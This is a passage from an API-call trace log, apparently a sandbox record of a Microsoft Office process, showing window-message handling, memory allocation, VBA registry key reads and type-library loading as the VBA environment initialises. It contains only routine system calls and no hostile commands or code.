wParam=0x0, lParam=0x2e59a0) returned 0x0 [0032.206] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e5970) returned 0x0 [0032.206] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e59a0) returned 0x0 [0032.206] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x3, wParam=0x0, lParam=0x1e0002) returned 0x0 [0032.206] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x5, wParam=0x0, lParam=0x33004f) returned 0x0 [0032.208] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, wParam=0x0, lParam=0x2e4c80) returned 0x0 [0032.208] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e4c50) returned 0x0 [0032.208] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e4c80) returned 0x0 [0032.208] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x5, wParam=0x0, lParam=0x330060) returned 0x0 [0032.209] GetClientRect (in: hWnd=0x10228, lpRect=0x2e59e0 | out: lpRect=0x2e59e0) returned 1 [0032.211] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.212] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.212] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.212] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.212] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.212] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.213] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.213] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.214] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.214] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.214] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4d4b, lpBuffer=0x2e5922, cchBufferMax=255 | out: lpBuffer="Zoom") returned 0x4 [0032.214] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.214] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.214] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.215] lstrcpyA (in: lpString1=0x2e5eb0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.215] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.215] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.215] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e6070 | out: phkResult=0x2e6070*=0xa48) returned 0x0 [0032.215] GetParent (hWnd=0x10228) returned 0x10222 [0032.215] GetParent (hWnd=0x1022e) returned 0x10222 [0032.215] GetParent (hWnd=0x10224) returned 0x10222 [0032.216] SetWindowPos (hWnd=0x10228, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0032.216] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x46, wParam=0x0, lParam=0x2e5e40) returned 0x0 [0032.216] GetSystemMetrics (nIndex=51) returned 18 [0032.216] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x47, wParam=0x0, lParam=0x2e5e40) returned 0x0 [0032.216] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x3, wParam=0x0, lParam=0x120000) returned 0x0 [0032.216] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5518 | out: lpRect=0x2e5518) returned 1 [0032.216] IsWindow (hWnd=0x10228) returned 1 [0032.216] GetClientRect (in: hWnd=0x10228, lpRect=0x2e53b0 | out: lpRect=0x2e53b0) returned 1 [0032.216] GetSystemMetrics (nIndex=2) returned 17 [0032.216] MoveWindow (hWnd=0x1022a, X=-1, Y=27, nWidth=102, nHeight=56, bRepaint=1) returned 1 [0032.216] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, wParam=0x0, lParam=0x2e5340) returned 0x0 [0032.216] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e5310) returned 0x0 [0032.216] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e5340) returned 0x0 [0032.217] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x5, wParam=0x0, lParam=0x210060) returned 0x0 [0032.218] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x5, wParam=0x0, lParam=0x520064) returned 0x0 [0032.218] SetWindowPos (hWnd=0x1022e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0032.218] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x46, wParam=0x0, lParam=0x2e5e40) returned 0x0 [0032.218] GetSystemMetrics (nIndex=51) returned 18 [0032.218] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x47, wParam=0x0, lParam=0x2e5e40) returned 0x0 [0032.218] SendMessageA (hWnd=0x10232, Msg=0x14f, wParam=0x0, lParam=0x0) returned 0x1 [0032.218] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x14f, wParam=0x0, lParam=0x0) returned 0x1 [0032.218] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x3, wParam=0x0, lParam=0x120000) returned 0x0 [0032.218] BeginDeferWindowPos (nNumWindows=3) returned 0x60233 [0032.219] DeferWindowPos (hWinPosInfo=0x60233, hWnd=0x10232, hWndInsertAfter=0x0, x=0, y=0, cx=178, cy=18, uFlags=0x16) returned 0x60233 [0032.219] GetWindowRect (in: hWnd=0x10236, lpRect=0x2e56a0 | out: lpRect=0x2e56a0) returned 1 [0032.219] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1022e, lpPoints=0x2e56a0, cPoints=0x2 | out: lpPoints=0x2e56a0) returned -3080200 [0032.219] DeferWindowPos (hWinPosInfo=0x60233, hWnd=0x10236, hWndInsertAfter=0x0, x=0, y=0, cx=180, cy=29, uFlags=0x116) returned 0x60233 [0032.219] SendMessageA (hWnd=0x10236, Msg=0x1328, wParam=0x0, lParam=0x2e56a0) returned 0x0 [0032.219] DeferWindowPos (hWinPosInfo=0x60233, hWnd=0x10238, hWndInsertAfter=0x0, x=4, y=46, cx=172, cy=3, uFlags=0x110) returned 0x60233 [0032.219] EndDeferWindowPos (hWinPosInfo=0x60233) returned 1 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x46, wParam=0x0, lParam=0x2e5620) returned 0x1 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x83, wParam=0x1, lParam=0x2e55f0) returned 0x0 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x46, wParam=0x0, lParam=0x2e5620) returned 0x0 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x83, wParam=0x1, lParam=0x2e55f0) returned 0x0 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x47, wParam=0x0, lParam=0x2e5620) returned 0x0 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x5, wParam=0x0, lParam=0x1200b2) returned 0x1 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x46, wParam=0x0, lParam=0x2e4840) returned 0x1 [0032.219] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x83, wParam=0x1, lParam=0x2e4810) returned 0x0 [0032.220] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x47, wParam=0x0, lParam=0x2e4840) returned 0x0 [0032.220] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x5, wParam=0x0, lParam=0x1300b2) returned 0x0 [0032.220] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x47, wParam=0x0, lParam=0x2e5620) returned 0x0 [0032.220] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x3, wParam=0x0, lParam=0x2f0005) returned 0x0 [0032.220] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x5, wParam=0x0, lParam=0x100aa) returned 0x0 [0032.220] GetClientRect (in: hWnd=0x10238, lpRect=0x2e5630 | out: lpRect=0x2e5630) returned 1 [0032.221] SendMessageA (hWnd=0x10238, Msg=0x188, wParam=0x0, lParam=0x0) returned 0xffffffffffffffff [0032.221] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x188, wParam=0x0, lParam=0x0) returned 0xffffffffffffffff [0032.221] InvalidateRect (hWnd=0x10236, lpRect=0x0, bErase=1) returned 1 [0032.221] InvalidateRect (hWnd=0x10238, lpRect=0x0, bErase=1) returned 1 [0032.221] InvalidateRect (hWnd=0x1023c, lpRect=0x0, bErase=1) returned 1 [0032.221] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x5, wParam=0x0, lParam=0x3500b4) returned 0x0 [0032.221] SetWindowPos (hWnd=0x10224, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0032.221] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.221] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x24, wParam=0x0, lParam=0x2e5890) returned 0x0 [0032.221] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.221] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x81, wParam=0x0, lParam=0x2e5860) returned 0x1 [0032.221] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.221] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x83, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0032.221] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.221] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1, wParam=0x0, lParam=0x2e5860) returned 0x0 [0032.221] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x5, wParam=0x0, lParam=0xa0024b) returned 0x0 [0032.222] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x3, wParam=0x0, lParam=0x1720021) returned 0x0 [0032.222] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x24, wParam=0x0, lParam=0x2e5890) returned 0x0 [0032.222] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x81, wParam=0x0, lParam=0x2e5860) returned 0x1 [0032.222] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x83, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0032.222] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.222] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1, wParam=0x0, lParam=0x2e5860) returned 0x0 [0032.223] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.223] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x5, wParam=0x0, lParam=0x8000b4) returned 0x0 [0032.223] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x0 [0032.223] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x3, wParam=0x0, lParam=0x8102f8) returned 0x0 [0032.223] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.223] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x24, wParam=0x0, lParam=0x2e5890) returned 0x0 [0032.223] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.223] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x81, wParam=0x0, lParam=0x2e5860) returned 0x1 [0032.223] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.223] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x83, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1, wParam=0x0, lParam=0x2e5860) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x5, wParam=0x0, lParam=0x11b00b4) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x3, wParam=0x0, lParam=0x2300059) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x24, wParam=0x0, lParam=0x2e5890) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x81, wParam=0x0, lParam=0x2e5860) returned 0x1 [0032.224] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x83, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.224] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1, wParam=0x0, lParam=0x2e5860) returned 0x0 [0032.224] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.225] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x5, wParam=0x0, lParam=0x163003f) returned 0x0 [0032.225] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x0 [0032.225] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x3, wParam=0x0, lParam=0xbc033a) returned 0x0 [0032.228] lstrlenA (lpString="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB") returned 73 [0032.228] lstrcpyA (in: lpString1=0x91e3370, lpString2="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB") returned="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" [0032.230] LoadTypeLib (in: szFile="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB", pptlib=0x7fee3aa9778*=0x0 | out: pptlib=0x7fee3aa9778*=0x782d1f0) returned 0x0 [0032.265] IUnknown:AddRef (This=0x782d1f0) returned 0x2 [0032.265] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c918*(Data1=0x2e166, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3398 | out: ppTInfo=0x91e3398*=0xb41bd48) returned 0x0 [0032.265] IUnknown:Release (This=0x782d1f0) returned 0x2 [0032.265] IUnknown:AddRef (This=0x782d1f0) returned 0x3 [0032.265] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e70e0 [0032.266] IUnknown:AddRef (This=0x782d1f0) returned 0x4 [0032.266] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a86ea8*(Data1=0xeee00919, Data2=0xe393, Data3=0x11d1, Data4=([0]=0xbb, [1]=0x3, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xc4, [7]=0xa6)), ppTInfo=0x91e3418 | out: ppTInfo=0x91e3418*=0xb41bea8) returned 0x0 [0032.266] IUnknown:Release (This=0x782d1f0) returned 0x4 [0032.266] IUnknown:AddRef (This=0x782d1f0) returned 0x5 [0032.266] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a86ed8*(Data1=0x2e167, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e34a8 | out: ppTInfo=0x91e34a8*=0xb41bf58) returned 0x0 [0032.266] IUnknown:Release (This=0x782d1f0) returned 0x5 [0032.266] IUnknown:AddRef (This=0x782d1f0) returned 0x6 [0032.266] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a86eb8*(Data1=0xf57b7ed0, Data2=0xd8ab, Data3=0x11d1, Data4=([0]=0x85, [1]=0xdf, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0xf4, [7]=0x2c)), ppTInfo=0x91e35c0 | out: ppTInfo=0x91e35c0*=0xb41c008) returned 0x0 [0032.266] IUnknown:Release (This=0x782d1f0) returned 0x6 [0032.266] IUnknown:AddRef (This=0x782d1f0) returned 0x7 [0032.266] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a858e8*(Data1=0xda936b62, Data2=0xac8b, Data3=0x11d1, Data4=([0]=0xb6, [1]=0xe5, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0x44)), ppTInfo=0x91e3648 | out: ppTInfo=0x91e3648*=0xb41c0b8) returned 0x0 [0032.266] IUnknown:Release (This=0x782d1f0) returned 0x7 [0032.266] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64", phkResult=0x2e5fd8 | out: phkResult=0x2e5fd8*=0x0) returned 0x2 [0032.266] lstrcpyA (in: lpString1=0x2e5d30, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.266] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.266] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.266] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5ee8 | out: phkResult=0x2e5ee8*=0xa6c) returned 0x0 [0032.266] lstrcpyA (in: lpString1=0x2e5d50, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.266] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.266] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.267] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f00 | out: phkResult=0x2e5f00*=0xa6c) returned 0x0 [0032.267] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.267] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa6c) returned 0x0 [0032.267] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.267] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa6c) returned 0x0 [0032.267] lstrcpyA (in: lpString1=0x2e5da0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.267] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.267] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f38 | out: phkResult=0x2e5f38*=0xa6c) returned 0x0 [0032.267] LoadStringA (in: hInstance=0x7fef1850000, uID=0x822, lpBuffer=0x2e5f40, cchBufferMax=40 | out: lpBuffer="MainWindow") returned 0xa [0032.267] RegQueryValueExA (in: hKey=0xa6c, lpValueName="MainWindow", lpReserved=0x0, lpType=0x0, lpData=0x2e6000, lpcbData=0x2e5f30*=0x1e | out: lpType=0x0, lpData=0x2e6000*=0x0, lpcbData=0x2e5f30*=0x1e) returned 0x2 [0032.267] RegCloseKey (hKey=0xa6c) returned 0x0 [0032.267] lstrcpyA (in: lpString1=0x2e6000, lpString2="" | out: lpString1="") returned="" [0032.267] lstrlenA (lpString="") returned 0 [0032.268] MonitorFromWindow (hwnd=0x10222, dwFlags=0x2) returned 0x10001 [0032.268] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e5f48 | out: lpmi=0x2e5f48) returned 1 [0032.268] IUnknown:AddRef (This=0x782d1f0) returned 0x8 [0032.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e37d8 | out: ppTInfo=0x91e37d8*=0xb41c168) returned 0x0 [0032.268] IUnknown:Release (This=0x782d1f0) returned 0x8 [0032.268] IUnknown:AddRef (This=0x782d1f0) returned 0x9 [0032.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a86ec8*(Data1=0x2e16c, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3848 | out: ppTInfo=0x91e3848*=0xb41c218) returned 0x0 [0032.268] IUnknown:Release (This=0x782d1f0) returned 0x9 [0032.268] IUnknown:AddRef (This=0x782d1f0) returned 0xa [0032.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e38a8 | out: ppTInfo=0x91e38a8*=0xb41c168) returned 0x0 [0032.268] IUnknown:Release (This=0x782d1f0) returned 0xa [0032.268] IUnknown:AddRef (This=0x782d1f0) returned 0xb [0032.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3918 | out: ppTInfo=0x91e3918*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0xb [0032.269] IUnknown:AddRef (This=0x782d1f0) returned 0xc [0032.269] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e39c8 | out: ppTInfo=0x91e39c8*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0xc [0032.269] IUnknown:AddRef (This=0x782d1f0) returned 0xd [0032.269] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3a78 | out: ppTInfo=0x91e3a78*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0xd [0032.269] IUnknown:AddRef (This=0x782d1f0) returned 0xe [0032.269] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3b28 | out: ppTInfo=0x91e3b28*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0xe [0032.269] IUnknown:AddRef (This=0x782d1f0) returned 0xf [0032.269] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3c08 | out: ppTInfo=0x91e3c08*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0xf [0032.269] IUnknown:AddRef (This=0x782d1f0) returned 0x10 [0032.269] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3c78 | out: ppTInfo=0x91e3c78*=0xb41c168) returned 0x0 [0032.269] IUnknown:Release (This=0x782d1f0) returned 0x10 [0032.269] GetFocus () returned 0x30204 [0032.270] CExposedStream::Commit () returned 0x0 [0032.270] CExposedStream::Release () returned 0x0 [0032.270] GlobalHandle (pMem=0x71576f0) returned 0x5000088 [0032.270] GlobalUnlock (hMem=0x5000088) returned 0 [0032.270] CExposedDocFile::Stat () returned 0x0 [0032.270] 